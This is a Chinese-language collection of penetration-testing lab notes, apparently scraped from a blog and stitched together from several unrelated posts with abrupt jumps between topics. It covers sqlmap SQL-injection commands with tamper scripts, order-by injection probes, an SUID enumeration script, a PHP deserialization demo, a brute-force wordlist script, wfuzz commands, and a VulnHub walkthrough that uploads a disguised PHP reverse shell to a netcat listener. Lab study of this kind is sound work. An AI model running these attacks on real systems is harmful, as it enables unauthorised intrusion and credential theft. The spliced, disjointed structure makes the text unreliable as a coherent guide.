案例七：

192.168.2.131/sqli/example7.php?id=2

现在有一个问题，不知道背后的mysql语句到底过滤了什么，黑盒测试的话，就不知道如何针对性地绕过。

源代码

1
2
3

if (!preg_match('/^-?[0-9]+$/m', $_GET["id"])) {
  die("ERROR INTEGER REQUIRED");    
}

知识点：preg_match()函数的模式修饰符

1
2
3

_m_ (_PCRE_MULTILINE_)

默认情况下，PCRE 认为目标字符串是由单行字符组成的(然而实际上它可能会包含多行)， "行首"元字符 (^) 仅匹配字符串的开始位置， 而"行末"元字符 ($) 仅匹配字符串末尾， 或者最后的换行符(除非设置了 _D_ 修饰符)。这个行为和 perl 相同。 当这个修饰符设置之后，“行首”和“行末”就会匹配目标字符串中任意换行符之前或之后，另外， 还分别匹配目标字符串的最开始和最末尾位置。这等同于 perl 的 /m 修饰符。如果目标字符串 中没有 "\n" 字符，或者模式中没有出现 ^ 或 $，设置这个修饰符不产生任何影响。

所以，有了这个\m，如果加入换行符，那么就会导致匹配（换行符之前/之后/整个字符串）。

好了，现在问题解决了，主要是我建立的字典不够强大。 所以之前用intruder没有发现。

sqlmap -u "http://192.168.2.131/sqli/example7.php?id=2" --dbms mysql --tamper=space2newline.py --dbs

案例八-order-by：

http://192.168.2.131/sqli/example8.php?order=name

经过检查，只有#符号无影响，其他都导致页面查询失败。

知识点

order by是排序的语句，单引号不能跟order by同时使用。

‘name’ ，mysql会认为是常量。

我们看一条mysql语句

1

SELECT * FROM `MyTable` WHERE `id` IN (11,1,111) ORDER BY FIELD(`id`, 11,1,111);

尝试绕过

apostrophemask.py 用utf8代替引号 base64encode.py 将payload编码

sqlmap -u "http://192.168.2.131/sqli/example8.php?order=name" --dbms mysql --tamper=base64encode.py --dbs

sqlmap -u "http://192.168.2.131/sqli/example8.php?order=name" --dbms mysql -technique B --level 5

解析

绕不过了，然后看下答案。

如何确认order by注入？

下列语句，网页显示正常

1
2
3

order=age`%20DESC%20%23 
order=age`%20%23 
order=age`%20ASC%20%23

加入`符号，网页显示错误。

%20ASC、%20DESC，表示升序排序、降序排序。

如何利用order by注入，参考资料；

中关村在线order by语句的盲注思路的分享（wooyun）

wp

sqlmap -u "http://192.168.2.131/sqli/example8.php?order=id%60*" --dbms mysql --dbs --batch

–batch 当询问是否确定的时候，自动确定

%60是反引号，后接*，表示payload加在此处。

案例九-order-by：

sqlmap -u "http://192.168.2.131/sqli/example9.php?order=name" --dbms mysql -technique B --level 5

分析

虽然工具注入成功了，但还是分析一下。否则以后再遇到，只是碰运气，万一注入失败了，也不知道是哪里出错了。

mysql的if语句。

if(a,b,c) 如果a表达式为true，则运行表达式b；a = false，则运行表达式c。

两种注入语句，返回页面不同，说明有注入。

SolidState(Java Apache Mail server命令执行)

target machine download

案例一：

http://192.168.2.131/sqli/example1.php?name=root

资料下载：pentesterLab download

18年11月的时候，去找渗透测试的实习。以我半吊子的水平，当然还是不够的（==） 上图是去年的渗透实践。

参考资料

以前的步骤经常看到一个感兴趣的点，然后就一直死磕ORZ

学网络安全也有3年了== 从啥也不会的小白到各方面略懂一点的script kiddie。 网络安全cyber security，分支那么多。 到有幸到black hat ctf 加大佬微信问入行经验，我要是还不明白发展方向，不如找块豆腐撞死得了。

参考资料：linux 提权脚本

上一篇

通过这篇文章，学习shell脚本获取提权信息

nikto -host 192.168.1.135

WordPress/4.3.1

研究一下CVE-2017-8295：密码重置

https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

wordpress未授权密码重置

1
2
3
4
5
6

As we can see, Wordpress is using SERVER_NAME variable to get the hostname of
the server in order to create a From/Return-Path header of the outgoing password
reset email.
However, major web servers such as Apache by default set the SERVER_NAME variable
using the hostname supplied by the client (within the HTTP_HOST header):
这个cms在创建密码重置邮箱的时候，用到了主机名这个变量，而apache这种服务器，是使用客户提供的http主机头文件作为“主机名变量”

客户提供的http_host header 如果我们把这个变量改为“attackers-mxserver.com”，wordpress的“$from_email”变量为”wordpress@attackers-mxserver.com“

查找了一下不能发邮件的原因，==缺少了插件wp-mail-smtp。 http://www.jamesandchey.net/wordpress-the-e-mail-could-not-be-sent-possible-reason-your-host-may-have-disabled-the-mail-function/

好吧，就研究到这里，如果这个目标机有好好配置的话，是可以通过未授权密码重置，得到密码的。

研究一下shell脚本SUID检查

nmap并没有写在环境变量中，所以直接调用nmap是not found。 在这个靶机中，nmap很鸡贼地藏在/usr/local/bin/路径下。 nmap version 3.81，低版本的nmap可以以执行root

执行一下脚本，即可获取有SUID权限的二进制文件。

1
2
3
4

#!/bin/bash
cd /tmp
find / -perm -4000 2>/dev/null > examSUID.txt
cat examSUID.txt | grep -E "nmap|vim|find|bash|more|less|nano|cp"

script还很简陋，以后再优化优化。

php反序列化

参考资料：Understanding PHP Object Injection

php基础提要：

php允许保存一个对象方便以后重用，这就是序列化。 场景：变量值需要跨脚本传递。

序列化

反序列化

下面演示php反序列化。 建立logfile.php（定义了一个类，可以进行文件删除），use.php（使用这个类，生成序列化字符串）。 1.php（之后演示删除该脚本） test.php（接受序列化字符串，删除1.php）

use.php指定了一个文件，进行删除。 O:7:"LogFile":1:{s:8:"filename";s:5:"1.php";} 复制生成的这个序列，之后要用到。

之后，建立一个test.php，其中定义一个新的类 User。 此时图一建立的1.php还存在。 划重点，test.php因为接受了用户给出的变量usr_serialized，而用户的输入不可控。导致php脚本解析并执行了删除1.php的操作。

而test.php本来设计的功能，是传递“O:4:”User”:2:s:3:”age”;i:20;s:4:”name”;s:4:”John”;}”

于是页面会显示“User John is 20 years old.”

在跨页面传递变量的时候，没有设计好，就导致了这个命令执行。

download

scan

1
2
3
4

21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
8011/tcp open  unknown

ftp

21/tcp open ftp vsftpd 2.3.5

ssh

OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

• https://www.exploit-db.com/exploits/45001/ OpenSSH < 6.6 SFTP - Command Execution 失败

• https://www.exploit-db.com/exploits/45233/ OpenSSH 2.3 < 7.7 - Username Enumeration 成功 确认frank用户存在，但是爆破失败。笑容逐渐消失~~

  http-80port

  http://192.168.1.132/robots.txt显示这个路径存在，心中一喜，访问看看。 NOTHING here , yet ! MD好贱呐！

http-8011port

visit http://192.168.1.132:8011/ Development Server !

1
2

#nmap -sV -p 8011 192.168.1.132
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

info1

Apache/2.2.22 (Ubuntu) Server http://192.168.1.132/development/ 有一个登陆页面

Trying1

输入用户名123，密码123，发现以123:123的形式base64编码。 于是可以尝试爆破。

1
2
3
4
5
6
7
8
9
10
11
12
13

import base64
user = open("/usr/share/wordlists/rockyou.txt","r")
answer=open("/root/Desktop/302/answer.txt","w+")
while True:
	one = user.readline()
	#password = open("/usr/share/wordlists/rockyou.txt","r") 
	with open("/usr/share/wordlists/password.txt","r") as password:
		for one_password in password.readlines():	
			ans = one_password.strip("\n")+":"+one
			key = base64.b64encode(ans)
			answer.writelines(key+"\n")

user.close()

用burp intruder爆破，无果。

好吧，看看writeup，我承认我菜了==

https://delosec.com/vulnhub-ch4inrulz-writeup/

划重点

当时我扫描到了api这个页面，其中提示了四个页面，说在建设中，我检查了前两个，不存在，我就当作四个都不存在。。。

当时的精力花在80端口破解登陆页面去了。。。 反省，需要另开一篇，复习踩点。

http://192.168.1.132:8011/api/files_api.php

• 尝试get提交文件名

  1 2	YOUR IP IS : 192.168.1.128 WRONG INPUT !!

• 尝试post提交文件名 说明该php没有禁止post方式==

接下来我尝试了好久，找apache日志的地址，结果都是无用功。。

• nikto -h ip 找到了一个备份文件 http://192.168.1.132/index.html.bak

1
2
3
4
5
6

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

ORZ，我爆破了那么久的口令，就藏在备份文件里了吗。。。 当我尝试$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0作为口令登陆失败，我意识到这可能是一个路径，而不是口令。

于是我找到了另一个登陆页面http://192.168.1.132/development/$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

em。。？黑人问号

• 新知识点1 Apache密码类型 以前遇到的都是加盐（salt）类型的mdf，md5($pass.$salt)。 这次遇到的这一串$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 貌似是apache特有的加密方式==，长见识了。密码学没怎么学。

总之获得了frank:frank!!!口令，登陆后，看到了上传页面。

上传了一个png，然后找图片上传路径==，找了半天没找到。 看了wp，路径是/development/uploader/FRANKuploads

• 新知识点2 wfuzz的使用

1
2
3
4
5

-c 有颜色的输出
-z 扫描模式，可以字典扫描，数字范围扫描。。。
--hc 隐藏具体的响应代码，例如404,200之类的
FUZZ 是需要爆破替换的地址。
--basic 测试一个需要HTTP Basic Auth保护的内容

example:

1
2
3

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --basic "frank:frank!!!" --hc 404 "http://ip/development/uploader/FRANKFUZZ"

wfuzz -c -z range,1-65535 --hl=2 http://ip:60000/url.php?path=http://localhost:FUZZ

文件上传

1. nc -lnvp 1234
2. 选择/usr/share/webshells/php/php-reverse-shell.php
3. 开burp拦截，因为只允许图片类型 后缀改为gif，文件内容改为GIF98，点go就可以成功上传。
4. 绝对路径进行文件包含。 linux2.6，版本很低嘛，很明显的内核漏洞提权，快讲烂了==

总结

wfuzz、nikto、johntheripper，复习了工具的使用。 明明知道怎么操作，但是就是因为字典或者工具的原因无法成功利用那才是灾难。。。